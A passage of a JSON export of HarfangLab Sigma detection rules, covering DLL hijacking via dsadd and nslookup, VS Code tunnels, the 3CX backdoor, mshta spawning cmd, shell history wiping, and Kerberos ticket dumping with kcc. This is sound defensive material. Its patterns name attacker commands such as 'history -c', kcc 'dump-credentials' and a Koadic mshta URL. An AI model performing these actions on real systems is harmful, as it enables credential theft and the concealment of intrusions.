"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.080798Z",
"creation_date": "2026-03-23T11:45:34.080800Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.080805Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/xforcered/WFH",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_dsadd.yml",
"content": "title: DLL Hijacking via dsadd.exe\nid: 42063cd7-a184-4060-aa08-24504240bb0b\ndescription: |\n Detects potential Windows DLL Hijacking via dsadd.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://github.com/xforcered/WFH\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'dsadd.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\activeds.dll'\n - '\\netapi32.dll'\n - '\\ntdsapi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "42063cd7-a184-4060-aa08-24504240bb0b",
"rule_name": "DLL Hijacking via dsadd.exe",
"rule_description": "Detects potential Windows DLL Hijacking via dsadd.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "42219252-5c4c-42ea-b6aa-3a48b6da5be0",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.623381Z",
"creation_date": "2026-03-23T11:45:34.623383Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.623387Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.sentinelone.com/labs/operation-digital-eye-chinese-apt-compromises-critical-digital-infrastructure-via-visual-studio-code-tunnels/",
"https://unit42.paloaltonetworks.com/stately-taurus-abuses-vscode-southeast-asian-espionage/",
"https://ipfyx.fr/post/visual-studio-code-tunnel/",
"https://code.visualstudio.com/docs/remote/tunnels",
"https://attack.mitre.org/techniques/T1572/",
"https://attack.mitre.org/techniques/T1090/",
"https://attack.mitre.org/techniques/T1567/"
],
"name": "t1090_vs_code_tunnel.yml",
"content": "title: VSCode Proxy Tunnel Started\nid: 42219252-5c4c-42ea-b6aa-3a48b6da5be0\ndescription: |\n Detects the VSCode binary being executed with command-line arguments indicating the start of a VS Code network tunnel.\n Since July 2023, Microsoft Visual Studio Code includes a feature called Dev Tunnels that allows remote access to a system by exposing local services through Microsoft-managed infrastructure.\n Threat actors have abused this functionality to gain persistent remote access, bypass network restrictions, and evade traditional remote access detections by leveraging trusted Microsoft domains.\n It is recommended to investigate the actions performed in the shell that this tunnel spawns to determine if it is legitimate developer activity.\nreferences:\n - https://www.sentinelone.com/labs/operation-digital-eye-chinese-apt-compromises-critical-digital-infrastructure-via-visual-studio-code-tunnels/\n - https://unit42.paloaltonetworks.com/stately-taurus-abuses-vscode-southeast-asian-espionage/\n - https://ipfyx.fr/post/visual-studio-code-tunnel/\n - https://code.visualstudio.com/docs/remote/tunnels\n - https://attack.mitre.org/techniques/T1572/\n - https://attack.mitre.org/techniques/T1090/\n - https://attack.mitre.org/techniques/T1567/\ndate: 2026/01/09\nmodified: 2026/01/27\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1090\n - attack.t1572\n - attack.exfiltration\n - attack.t1567\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Tunneling\n - classification.Windows.Behavior.CommandAndControl\n - classification.Windows.Behavior.Exfiltration\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_binary:\n CommandLine|contains: ' tunnel'\n Image|endswith:\n - 'code.exe'\n - 'code-tunnel.exe'\n - 'code-tunnel-insiders.exe'\n\n selection_imphash:\n CommandLine|contains: ' tunnel'\n Imphash:\n - 'c5cb69f09d753530411528e2a0041c10'\n - 'b2c20053c09c4ac294fac649bd52b9d7'\n - 'ffba461184ce9e88225c05180ed9ae0e'\n - 'ece9f6a03a1eb2222b33a67bd692cbcf'\n - '6b319b5d822e4d8976962e9f829623fa'\n - '8f37d2bc0de4d67940d0bd62c3aa8f2f'\n - 'd2b046a0864290ecddf0b1cbbd1fbdfa'\n - '39cbe2ab95201144169ebe4082bcd960'\n - '67481da3531c3eec93994a63859fbf85'\n - '346303b98cec2b81d96c84895a63295c'\n - '14d1060d69daaf2de5c9457a561d4145'\n - '127d26d854177e542674f64784c7ddb1'\n - 'f756ba36b253d4ceb47eaaa6e0069c6e'\n - '6e1c8155b811a1d8dff929558aa6751d'\n Signed: 'true'\n Signature: 'Microsoft Corporation'\n\n selection_commandline:\n CommandLine|contains:\n - ' tunnel --accept-server-license-terms'\n - ' tunnel service install'\n - ' tunnel service internal-run'\n\n filter_commandline:\n CommandLine|contains:\n - ' tunnel status'\n - ' tunnel user login'\n - ' tunnel forward-internal'\n - ' tunnel kill'\n\n # Avoid multiple detection\n filter_explorer:\n CommandLine|contains: ' tunnel service internal-run'\n ParentImage: '?:\\Windows\\explorer.exe'\n\n condition: (((selection_binary or selection_imphash) and not filter_commandline) or selection_commandline) and not filter_explorer\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "42219252-5c4c-42ea-b6aa-3a48b6da5be0",
"rule_name": "VSCode Proxy Tunnel Started",
"rule_description": "Detects the VSCode binary being executed with command-line arguments indicating the start of a VS Code network tunnel.\nSince July 2023, Microsoft Visual Studio Code includes a feature called Dev Tunnels that allows remote access to a system by exposing local services through Microsoft-managed infrastructure.\nThreat actors have abused this functionality to gain persistent remote access, bypass network restrictions, and evade traditional remote access detections by leveraging trusted Microsoft domains.\nIt is recommended to investigate the actions performed in the shell that this tunnel spawns to determine if it is legitimate developer activity.\n",
"rule_creation_date": "2026-01-09",
"rule_modified_date": "2026-01-27",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.exfiltration"
],
"rule_technique_tags": [
"attack.t1090",
"attack.t1567",
"attack.t1572"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "424e493f-40de-4ea2-ab95-466e6867c197",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.601239Z",
"creation_date": "2026-03-23T11:45:34.601243Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.601251Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://unprotect.it/technique/dll-search-order-hijacking/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_nslookup.yml",
"content": "title: DLL Hijacking via nslookup.exe\nid: 424e493f-40de-4ea2-ab95-466e6867c197\ndescription: |\n Detects potential Windows DLL Hijacking via nslookup.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://unprotect.it/technique/dll-search-order-hijacking/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'nslookup.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\DNSAPI.dll'\n - '\\mswsock.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "424e493f-40de-4ea2-ab95-466e6867c197",
"rule_name": "DLL Hijacking via nslookup.exe",
"rule_description": "Detects potential Windows DLL Hijacking via nslookup.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "42845992-7070-4491-a6c9-45ef10ed971b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.619238Z",
"creation_date": "2026-03-23T11:45:34.619240Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.619245Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.huntress.com/blog/3cx-voip-software-compromise-supply-chain-threats",
"https://www.trendmicro.com/de_de/research/23/c/information-on-attacks-involving-3cx-desktop-app.html",
"https://attack.mitre.org/techniques/T1195/002/"
],
"name": "t1195_002_3cx_spawning_suspicious_process.yml",
"content": "title: Suspicious Process Spawned by 3CXDesktopApp\nid: 42845992-7070-4491-a6c9-45ef10ed971b\ndescription: |\n Detects suspicious processes started by the 3CXDesktopApp software.\n In late March 2023, the 3CXDesktopApp software was backdoored and turned into a stealer in a wide supply chain attack.\n It is recommended to investigate the newly created process for suspicious activities.\nreferences:\n - https://www.huntress.com/blog/3cx-voip-software-compromise-supply-chain-threats\n - https://www.trendmicro.com/de_de/research/23/c/information-on-attacks-involving-3cx-desktop-app.html\n - https://attack.mitre.org/techniques/T1195/002/\ndate: 2023/03/31\nmodified: 2025/04/08\nauthor: HarfangLab\ntags:\n - attack.initial_access\n - attack.t1195.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Trojan.3CX\n - classification.Windows.Behavior.InitialAccess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_image:\n ParentImage|endswith: '\\3CXDesktopApp.exe'\n\n selection_bin:\n OriginalFileName:\n - 'Cmd.Exe'\n - 'PowerShell.EXE'\n - 'cscript.exe'\n - 'wscript.exe'\n - 'schtasks.exe'\n - 'REGSVR32.EXE'\n - 'wmic.exe' # use wmic to spawn PowerShell or else under wmiprvse or squiblytwo\n - 'MSHTA.EXE'\n - 'RUNDLL32.EXE'\n - 'msiexec.exe'\n - 'MSBuild.exe' # https://github.com/elastic/detection-rules/blob/main/rules/windows/defense_evasion_execution_msbuild_started_by_office_app.toml\n - 'appvlp.exe' # lolbas : https://lolbas-project.github.io/lolbas/OtherMSBinaries/Appvlp/\n - 'extrac32.exe' # https://twitter.com/ShadowChasing1/status/1557287930267578368\n\n condition: all of selection_*\nlevel: high\n# level: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "42845992-7070-4491-a6c9-45ef10ed971b",
"rule_name": "Suspicious Process Spawned by 3CXDesktopApp",
"rule_description": "Detects suspicious processes started by the 3CXDesktopApp software.\nIn late March 2023, the 3CXDesktopApp software was backdoored and turned into a stealer in a wide supply chain attack.\nIt is recommended to investigate the newly created process for suspicious activities.\n",
"rule_creation_date": "2023-03-31",
"rule_modified_date": "2025-04-08",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.initial_access"
],
"rule_technique_tags": [
"attack.t1195.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "42b184cd-02dd-4a06-9de2-f8424574bac6",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.070967Z",
"creation_date": "2026-03-23T11:45:34.070969Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.070973Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/Binaries/Mshta/",
"https://attack.mitre.org/techniques/T1218/005/"
],
"name": "t1218_005_mshta_cmd.yml",
"content": "title: Cmd Execution via mshta.exe\nid: 42b184cd-02dd-4a06-9de2-f8424574bac6\ndescription: |\n Detects the execution of cmd.exe by mshta.exe.\n Mshta can be used to proxy the execution of a malicious JScript that may use the \"WScript.shell\" ActiveX object to run arbitrary commands, which spawns an intermediary \"cmd.exe\".\n It is recommended to check the spawned process for suspicious activities.\nreferences:\n - https://lolbas-project.github.io/lolbas/Binaries/Mshta/\n - https://attack.mitre.org/techniques/T1218/005/\ndate: 2021/02/10\nmodified: 2025/04/25\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218.005\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Mshta\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n # mshta http://xxx.xxx.xxx.xxx:9999/OvJQ5 (Koadic)\n selection_child:\n - Image|endswith: '\\cmd.exe'\n - OriginalFileName: 'Cmd.EXE'\n\n selection_parent:\n ParentImage|endswith: '\\mshta.exe'\n\n exclusion_hp:\n ParentCommandLine|contains:\n - '\\Program Files\\HP\\'\n - '\\Program Files (x86)\\HP\\'\n\n exclusion_ping:\n CommandLine: '?:\\windows\\system32\\cmd.exe /c ping -n ? 127.0.0.1>nul'\n\n exclusion_copy:\n CommandLine:\n - '?:\\Windows\\System32\\cmd.exe /c copy ?:\\\\* ?:\\\\*'\n - '?:\\Windows\\System32\\cmd.exe /c robocopy ?:\\\\* ?:\\\\*'\n\n exclusion_type:\n CommandLine: '?:\\Windows\\System32\\cmd.exe /c type ?:\\Users\\\\*\\AppData\\Local\\Temp\\\\*.tmp.ini*'\n\n exclusion_cls:\n CommandLine: '?:\\Windows\\System32\\cmd.exe /C cls'\n\n exclusion_driverpack:\n CommandLine|startswith:\n - '?:\\Windows\\System32\\cmd.exe /c tools\\driverpack-wget.exe *--directory-prefix=?:\\Users\\\\*\\AppData\\Local\\Temp\\beetle-cab\\DriverPack\\audio\\fr http://dl.driverpack.io/'\n - '?:\\Windows\\System32\\cmd.exe /c netsh advfirewall firewall add rule name=DriverPack'\n - '?:\\Windows\\System32\\cmd.exe /c netsh advfirewall firewall delete rule name=DriverPack'\n\n exclusion_ivanti:\n Ancestors|contains:\n - '?:\\Program Files (x86)\\Ivanti\\EPM Agent\\SWD\\sdistbat.exe|?:\\Program Files (x86)\\Ivanti\\EPM Agent\\SWD\\SDCLIENT.EXE|?:\\Program Files (x86)\\Ivanti\\EPM Agent\\Shared Files\\residentAgent.exe'\n - '?:\\Program Files\\Ivanti\\EPM Agent\\SWD\\sdistbat.exe|?:\\Program Files\\Ivanti\\EPM Agent\\SWD\\SDCLIENT.EXE|?:\\Program Files\\Ivanti\\EPM Agent\\Shared Files\\residentAgent.exe'\n\n exclusion_bdfacsduet:\n GrandparentImage: '?:\\stratec\\BDFACSDuet\\InstrumentSetup\\IS-Start.exe'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "42b184cd-02dd-4a06-9de2-f8424574bac6",
"rule_name": "Cmd Execution via mshta.exe",
"rule_description": "Detects the execution of cmd.exe by mshta.exe.\nMshta can be used to proxy the execution of a malicious JScript that may use the \"WScript.shell\" ActiveX object to run arbitrary commands, which spawns an intermediary \"cmd.exe\".\nIt is recommended to check the spawned process for suspicious activities.\n",
"rule_creation_date": "2021-02-10",
"rule_modified_date": "2025-04-25",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1218.005"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "42be5cfc-1e0a-438e-8602-3207fa4956da",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.611693Z",
"creation_date": "2026-03-23T11:45:34.611697Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.611704Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md",
"https://attack.mitre.org/techniques/T1070/003/"
],
"name": "t1070_003_clear_history_file_linux.yml",
"content": "title: Shell History File Cleared (Linux)\nid: 42be5cfc-1e0a-438e-8602-3207fa4956da\ndescription: |\n Detects the shell history file being removed or truncated.\n Attackers may clear the command history of a compromised account to conceal the actions undertaken during an intrusion.\n It is recommended to investigate the context around this action and the offending process.\n If this action is legitimate and recurrent, it is highly recommended to create a whitelist for it.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md\n - https://attack.mitre.org/techniques/T1070/003/\ndate: 2023/01/03\nmodified: 2025/04/02\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1070.003\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.Deletion\n - classification.Linux.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection_rm:\n Image|endswith:\n - '/rm'\n - '/unlink'\n - '/dd'\n - '/truncate'\n - '/ln'\n CommandLine|contains:\n - '/root/.history'\n - '/root/.ash_history'\n - '/root/.bash_history'\n - '/root/.tcsh_history'\n - '/root/.sh_history'\n - '/root/.zhistory'\n - '/root/.zsh_history'\n - '/home/*/.history'\n - '/home/*/.ash_history'\n - '/home/*/.bash_history'\n - '/home/*/.tcsh_history'\n - '/home/*/.sh_history'\n - '/home/*/.zhistory'\n - '/home/*/.zsh_history'\n - /fish/fish_history'\n\n selection_shell:\n Image|endswith:\n - '/sh'\n - '/bash'\n - '/dash'\n - '/zsh'\n CommandLine|contains:\n - '>*/root/.history'\n - '>*/root/.ash_history'\n - '>*/root/.bash_history'\n - '>*/root/.tcsh_history'\n - '>*/root/.sh_history'\n - '>*/root/.zhistory'\n - '>*/root/.zsh_history'\n - '>*/home/*/.history'\n - '>*/home/*/.ash_history'\n - '>*/home/*/.bash_history'\n - '>*/home/*/.tcsh_history'\n - '>*/home/*/.sh_history'\n - '>*/home/*/.zhistory'\n - '>*/home/*/.zsh_history'\n - '>*/fish/fish_history'\n\n # We can't match against builtins but we can match against \"sh -c 'history -c'\" and other similar variants\n selection_builtin:\n CommandLine|contains: 'history -c'\n\n exclusion_history:\n CommandLine|contains: '_history -c'\n\n exclusion_stat:\n CommandLine|contains: ' /usr/bin/stat '\n\n exclusion_eclipse_workspace:\n CommandLine|contains: '/org.eclipse.core'\n\n exclusion_tar:\n Image: '/usr/bin/tar'\n\n exclusion_soltr:\n CommandLine|startswith: 'tar --exclude'\n GrandparentImage|startswith:\n - '/usr/sw/var/soltr'\n - '/usr/sw/loads/soltr'\n\n exclusion_neovim:\n CommandLine|contains: 'vimglob() { while [ $# -ge 1 ]; do echo \"$1\"; shift; done }; vimglob >/tmp/'\n\n condition: 1 of selection_* and not 1 of exclusion_*\nlevel: high\n#level: medium\nconfidence: moderate",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "42be5cfc-1e0a-438e-8602-3207fa4956da",
"rule_name": "Shell History File Cleared (Linux)",
"rule_description": "Detects the shell history file being removed or truncated.\nAttackers may clear the command history of a compromised account to conceal the actions undertaken during an intrusion.\nIt is recommended to investigate the context around this action and the offending process.\nIf this action is legitimate and recurrent, it is highly recommended to create a whitelist for it.\n",
"rule_creation_date": "2023-01-03",
"rule_modified_date": "2025-04-02",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1070.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "42bf430b-b73f-4376-aab1-4173d80d20f4",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.617493Z",
"creation_date": "2026-03-23T11:45:34.617496Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.617503Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1555/003/",
"https://attack.mitre.org/techniques/T1558/",
"https://attack.mitre.org/techniques/T1558/003/"
],
"name": "t1564_001_kcc_kerberos_ticket_dump.yml",
"content": "title: Kerberos Ticket Extracted via kcc\nid: 42bf430b-b73f-4376-aab1-4173d80d20f4\ndescription: |\n Detects the usage of kcc to extract a Kerberos Ticket.\n Adversaries may dump kerberos tickets and use them for lateral movement.\n It is recommended to check for other suspicious activities by the parent process.\nreferences:\n - https://attack.mitre.org/techniques/T1555/003/\n - https://attack.mitre.org/techniques/T1558/\n - https://attack.mitre.org/techniques/T1558/003/\ndate: 2024/07/22\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1555.003\n - attack.t1558\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Tool.Kcc\n - classification.macOS.Behavior.CredentialAccess\n - classification.macOS.Behavior.Lateralization\nlogsource:\n product: macos\n category: process_creation\ndetection:\n selection:\n ProcessName: 'kcc'\n CommandLine|contains:\n - 'dump-credentials'\n - 'copy_cred_cache'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "42bf430b-b73f-4376-aab1-4173d80d20f4",
"rule_name": "Kerberos Ticket Extracted via kcc",
"rule_description": "Detects the usage of kcc to extract a Kerberos Ticket.\nAdversaries may dump kerberos tickets and use them for lateral movement.\nIt is recommended to check for other suspicious activities by the parent process.\n",
"rule_creation_date": "2024-07-22",
"rule_modified_date": "2025-04-14",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1555.003",
"attack.t1558"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "42cd8416-c43f-466f-992d-7a756d832d7a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
